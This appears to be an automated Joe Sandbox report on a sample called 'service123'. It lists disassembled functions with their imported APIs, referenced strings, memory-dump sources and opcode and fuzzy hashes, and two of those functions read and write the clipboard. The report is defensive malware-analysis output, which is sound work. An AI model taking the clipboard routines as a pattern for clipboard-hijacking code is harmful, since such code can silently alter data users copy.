Function 6C9D0FC0 Relevance: 22.6, APIs: 8, Strings: 4, Instructions: 1647stringCOMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 6C9D0FCA
strlen.MSVCRT ref: 6C9D0FD4

Strings

, xrefs: 6C9D240F
!, xrefs: 6C9D2C08
5, xrefs: 6C9D14D2
inity, xrefs: 6C9D1E21

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: localeconvstrlen
String ID: $!$5$inity
API String ID: 186660782-1328200385
Opcode ID: 4918275207f1888eb7a0d57f7c3954a5a8057abfdac35f927235a26703b773c1
Instruction ID: f57885bbf319fec010d2361e8e3130009e2adada9c74583e42e421616963bfc4
Opcode Fuzzy Hash: 4918275207f1888eb7a0d57f7c3954a5a8057abfdac35f927235a26703b773c1
Instruction Fuzzy Hash: 2FF25775A08B81CFD324CF68C48475ABBE0BF8A358F12891DE9D9A7750D775E844CB82

Function 6CA484D0 Relevance: 17.7, Strings: 14, Instructions: 166COMMON

Download Yara Rule

Strings

Genu, xrefs: 6CA485DF
hardware, xrefs: 6CA486A0
rdrand, xrefs: 6CA485A8
default, xrefs: 6CA484EF
Auth, xrefs: 6CA485E7
rand_s, xrefs: 6CA486B7
rdseed, xrefs: 6CA48518
Auth, xrefs: 6CA48676
random_device::random_device(const std::string&): unsupported token, xrefs: 6CA486D2
random_device::random_device(const std::string&): device not available, xrefs: 6CA48598
rdrnd, xrefs: 6CA48618
Genu, xrefs: 6CA48557
Genu, xrefs: 6CA4866E
Auth, xrefs: 6CA4854F

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: memcmpstrlen
String ID: Auth$Auth$Auth$Genu$Genu$Genu$default$hardware$rand_s$random_device::random_device(const std::string&): device not available$random_device::random_device(const std::string&): unsupported token$rdrand$rdrnd$rdseed
API String ID: 3108337309-1359127009
Opcode ID: b6465edb5bc42ea533970bd80b4c452ad7eef5128c9c5ffd0bd4b9482ff580e2
Instruction ID: 10fdf3cf3f9696b9e9ae3c57bd2211c9c87f7b051020f0f3c4f81b91f0277611
Opcode Fuzzy Hash: b6465edb5bc42ea533970bd80b4c452ad7eef5128c9c5ffd0bd4b9482ff580e2
Instruction Fuzzy Hash: EC4149F26183414BE300AA39E98235AB6A2BB5431CF28CA3ED882D7F51D735C5D5C793

Function 6C9CEE50 Relevance: 12.5, APIs: 8, Instructions: 494COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C9CF18B
malloc.MSVCRT ref: 6C9CF1A8

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: cb7b1f896d625123c2726484e5c007aa61e7a15e066b5a78beea4607946aef5a
Instruction ID: 93a35d3fecf616566b00ef7561af749784b6ff2aa7b6d7b998c6cb6081cb0ba8
Opcode Fuzzy Hash: cb7b1f896d625123c2726484e5c007aa61e7a15e066b5a78beea4607946aef5a
Instruction Fuzzy Hash: A21269757087068FC710CF18C08061AB7E6BF88758F558A2DE8A997B50D734ED4ACB93

Function 6C9EE6E0 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 219stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C9EE70A
strlen.MSVCRT ref: 6C9EE77A

Strings

basic_string: construction from null is not valid, xrefs: 6C9EE86F, 6C9EE8C0, 6C9EE910
basic_string: construction from null is not valid, xrefs: 6C9EE742, 6C9EE7B2, 6C9EE822

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid$basic_string: construction from null is not valid
API String ID: 39653677-1250104765
Opcode ID: e068569dd69583098ab4d3a936242cbc08f1c124b8c63e30eab97f9dfdf733ec
Instruction ID: 3ce7d88ee26b755ec99936cbc588cc350b180249b97f76e1b4192c1f2e57c113
Opcode Fuzzy Hash: e068569dd69583098ab4d3a936242cbc08f1c124b8c63e30eab97f9dfdf733ec
Instruction Fuzzy Hash: AB61B0F1A157108FCB01BF2CD58149ABBE4BF59214F46496DE8849B715E331E889CBD2

Function 6C9D9D11 Relevance: 12.0, APIs: 8, Instructions: 46clipboardmemorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CA639D0: strlen.MSVCRT ref: 6CA639DE

OpenClipboard.USER32 ref: 6C9D9D31
GlobalAlloc.KERNEL32 ref: 6C9D9D55
GlobalLock.KERNEL32 ref: 6C9D9D72
strcpy.MSVCRT ref: 6C9D9D82
GlobalUnlock.KERNEL32 ref: 6C9D9D8A
EmptyClipboard.USER32 ref: 6C9D9D93
SetClipboardData.USER32 ref: 6C9D9DA4
CloseClipboard.USER32 ref: 6C9D9DAD

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlockstrcpystrlen
String ID:
API String ID: 3344633682-0
Opcode ID: 7b0b5998efb6060b6bb689c8c137868be5ac318b681799f67a29b941e47bdcd5
Instruction ID: 7c137be774ad664c23d4c3b2caa1c9378a0e5f8389b1f5f522a39e2a40f16b5b
Opcode Fuzzy Hash: 7b0b5998efb6060b6bb689c8c137868be5ac318b681799f67a29b941e47bdcd5
Instruction Fuzzy Hash: 9F11DDB15097028FDB04BF78D65929EBAF4BF15305F02892CE48697644EF34E449DB92

Function 6C9E0860 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 212stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C9E0886
memcmp.MSVCRT ref: 6C9E08A9
memcmp.MSVCRT ref: 6C9E091F
memcmp.MSVCRT ref: 6C9E0991

Part of subcall function 6CA8ADB0: strlen.MSVCRT ref: 6CA8ADBE

memcmp.MSVCRT ref: 6C9E0A25

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C9E08D0, 6C9E0944, 6C9E09B7, 6C9E0A4C, 6C9E0A68
basic_string::compare, xrefs: 6C9E08C8, 6C9E093C, 6C9E09AF, 6C9E0A44, 6C9E0A60

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: be6736e73986a55195d13a5e4ea6dd1b3b2dbbca5717b38037d7332136ee5b14
Instruction ID: 437a65059a12e7c846a8474857309f2b346d86e924205b0dee0fcb44cb427560
Opcode Fuzzy Hash: be6736e73986a55195d13a5e4ea6dd1b3b2dbbca5717b38037d7332136ee5b14
Instruction Fuzzy Hash: 48616872A0A7009FC300AF2DC98145EFBE5AFD8784F51892DE88887710DA31E884DB92

Function 6C9D70C0 Relevance: 9.6, APIs: 6, Instructions: 649COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 6C9D70C7
memset.MSVCRT ref: 6C9D7217

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: localeconvmemset
String ID:
API String ID: 2367598729-0
Opcode ID: 74796bd3ca59b0104614328cefe61d158e9990f9a333f3d5245a5bf08d8829c4
Instruction ID: d38ddf451d7ae99f024368c81b951133cd1cf8796f6ec36b6132d3f6f768e622
Opcode Fuzzy Hash: 74796bd3ca59b0104614328cefe61d158e9990f9a333f3d5245a5bf08d8829c4
Instruction Fuzzy Hash: C2421571608B418FD700CF28C48035ABBE6BF85308F56CA6DE495ABB49D775F949CB82

Function 6C9D5880 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 1506COMMON

Download Yara Rule

Strings

NaN, xrefs: 6C9D5B5F
Infinity, xrefs: 6C9D5BE0
, xrefs: 6C9D7074
, xrefs: 6C9D6D95

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID: $ $Infinity$NaN
API String ID: 0-3274152445
Opcode ID: efe4aa07ac18d9f03c7470011342f86ada250544d81491847201d82948d9f83f
Instruction ID: b45701da6a8f20365cf2ddda8a9b0cf54d1ff2eb58c899f038898b381ebc8ba6
Opcode Fuzzy Hash: efe4aa07ac18d9f03c7470011342f86ada250544d81491847201d82948d9f83f
Instruction Fuzzy Hash: 72E210B1A09B818FD310CF69C18074ABBE0FB89748F168D1EE895A7751E775E845CF82

Function 6C9D9E27 Relevance: 6.0, APIs: 4, Instructions: 38clipboardCOMMON

Download Yara Rule

APIs

GetClipboardData.USER32 ref: 6C9D9E37
GlobalLock.KERNEL32 ref: 6C9D9E49
GlobalUnlock.KERNEL32 ref: 6C9D9E6A
CloseClipboard.USER32 ref: 6C9D9E73
CloseClipboard.USER32 ref: 6C9D9E98

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: Clipboard$CloseGlobal$DataLockUnlock
String ID:
API String ID: 3186146249-0
Opcode ID: 38bcf44c7d35bf0ec57fe75a8ae9bc347dc7453c4ef8d59d33638208073ee20d
Instruction ID: 4c5eb1ef7aa17dda769cac89591a9324379e9eeb4c20bec65c618d8829900f00
Opcode Fuzzy Hash: 38bcf44c7d35bf0ec57fe75a8ae9bc347dc7453c4ef8d59d33638208073ee20d
Instruction Fuzzy Hash: 77F062B26047028FEB007F7C964819EBBF0AB45204F02453CD886A7640DF30E44E8793

Function 001C51B0 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 1506COMMON

Download Yara Rule

Strings

, xrefs: 001C66C5
, xrefs: 001C69A4

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: ca7e42b310233ed9efe05d407071627b058a3a6d710a7aebe827b93c116bf31c
Instruction ID: 8583992c4f33954149d8ac7492ee6dd96ae6bd1fef20f6c84cf4b429425655b0
Opcode Fuzzy Hash: ca7e42b310233ed9efe05d407071627b058a3a6d710a7aebe827b93c116bf31c
Instruction Fuzzy Hash: 21E243B1A087818FD724DF29C184B1AFBE1BFA8744F15891DE88997351E775E884CF82

Function 001C3E20 Relevance: 5.4, Strings: 4, Instructions: 351COMMON

Download Yara Rule

Strings

gfff, xrefs: 001C3F2C
@, xrefs: 001C3FD9
., xrefs: 001C4114
gfff, xrefs: 001C3F43

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID:
String ID: .$@$gfff$gfff
API String ID: 0-2633265772
Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
Instruction ID: a282f37abba1dabc4afd9f2fa3f829c399df4517a07fb29e88bc418ee6628807
Opcode Fuzzy Hash: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
Instruction Fuzzy Hash: 2DD1D171A083068BD714DF28C894B5BBBE2AFF4340F19C92DE8998B345D770DD498B92

Function 6C9D44F0 Relevance: 5.4, Strings: 4, Instructions: 351COMMON

Download Yara Rule

Strings

gfff, xrefs: 6C9D45FC
., xrefs: 6C9D47E4
@, xrefs: 6C9D46A9
gfff, xrefs: 6C9D4613

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID: .$@$gfff$gfff
API String ID: 0-2633265772
Opcode ID: 8626a3e6e77548aa8c80ec26b31963b047f7067a9e1e968e0f87eb2c543a7be7
Instruction ID: a117ea9267e5f08d81e4603abb041bdef05fabafe6c48c0128ca9ab8eab19035
Opcode Fuzzy Hash: 8626a3e6e77548aa8c80ec26b31963b047f7067a9e1e968e0f87eb2c543a7be7
Instruction Fuzzy Hash: 5AD1D571A08B468BD700CF29C48434BB7E6EFC5748F1AC52DE894ABB45D770E9488F92

Function 6CA63140 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

basic_string: construction from null is not valid, xrefs: 6CA63250

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID: basic_string: construction from null is not valid
API String ID: 0-2991274800
Opcode ID: f20a72a967f160d8f388a95ddc61a759eef44786352d5505ec0f053894166129
Instruction ID: 7806f16d593193ec1e3b19f6bb1b7d9a054743ab6b7f8ea842fb67cc0a0b2cd0
Opcode Fuzzy Hash: f20a72a967f160d8f388a95ddc61a759eef44786352d5505ec0f053894166129
Instruction Fuzzy Hash: F1416EB290A3108FD714DF6ED58065AFBE0EF99314F19C96EE8988B705D330D885CB92

Function 6CA60730 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6CA607A0
memset.MSVCRT ref: 6CA607C4

Strings

basic_string::_M_replace_aux, xrefs: 6CA60840

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: memmovememset
String ID: basic_string::_M_replace_aux
API String ID: 1288253900-2536181960
Opcode ID: cbfae72b517f54d5644519eae0ed1d0bc0408749b7afc822a32ec9c4a3fec8f0
Instruction ID: 50ea40cdf81edcd905abd2fd17b0603c7d92aacaadfc9d69cb7f2b8be1a4388d
Opcode Fuzzy Hash: cbfae72b517f54d5644519eae0ed1d0bc0408749b7afc822a32ec9c4a3fec8f0
Instruction Fuzzy Hash: FE317E75609A908FC7049F2AC48061AFFF1AFC6604F19856DE8988BB45D631D8C4CF96

Function 6CA33840 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6CA33898
memcpy.MSVCRT ref: 6CA33911

Part of subcall function 6CA35590: memcpy.MSVCRT ref: 6CA35620

Strings

basic_string::_M_replace_aux, xrefs: 6CA338C0

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: memcpy$memset
String ID: basic_string::_M_replace_aux
API String ID: 438689982-2536181960
Opcode ID: 6f6e6bfdf7737a9ccc5e2b466d8ddd226a0a96ea3a664c38fa414829ecd59020
Instruction ID: 995e77a180bf522703ea5273c09a25ffc62977397ac279e6b2185da5a55c0941
Opcode Fuzzy Hash: 6f6e6bfdf7737a9ccc5e2b466d8ddd226a0a96ea3a664c38fa414829ecd59020
Instruction Fuzzy Hash: E3215E72E0A3209FC300AF1D989046EFBE4EB95658F95896EF888D7311D331D858CB92

Function 6C9EA9E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C9EA9FD
wcslen.MSVCRT ref: 6C9EAA4D

Strings

basic_string: construction from null is not valid, xrefs: 6C9EAA20, 6C9EAA70

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: 42151c727aee3866924bc0afe39642079518f5ed9459ec35cdb0ba22c2c1e344
Instruction ID: 3def9265f5541855007634acde81f9ec73af6bb5f7052e8a7fc86d5ed8da50e2
Opcode Fuzzy Hash: 42151c727aee3866924bc0afe39642079518f5ed9459ec35cdb0ba22c2c1e344
Instruction Fuzzy Hash: 1411D3B19117148FCB00AF2CC18186ABBF4BF55214F02086DE8C49B310D631D888CB92

Function 6C9EA5F0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C9EA60D
wcslen.MSVCRT ref: 6C9EA65D

Strings

basic_string: construction from null is not valid, xrefs: 6C9EA630, 6C9EA680

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: 42151c727aee3866924bc0afe39642079518f5ed9459ec35cdb0ba22c2c1e344
Instruction ID: b73e21424d9d2f417e047f5d9edd86d244802bb303d5e7598d15a9b89620a46c
Opcode Fuzzy Hash: 42151c727aee3866924bc0afe39642079518f5ed9459ec35cdb0ba22c2c1e344
Instruction Fuzzy Hash: 5D1193B19157148FCB01AF6CC18186ABBF4BF56218F03096DE8C49B315D631D989CB92

Function 6C9F98F0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 1123COMMON

Download Yara Rule

Strings

-, xrefs: 6C9FA30E

Memory Dump Source

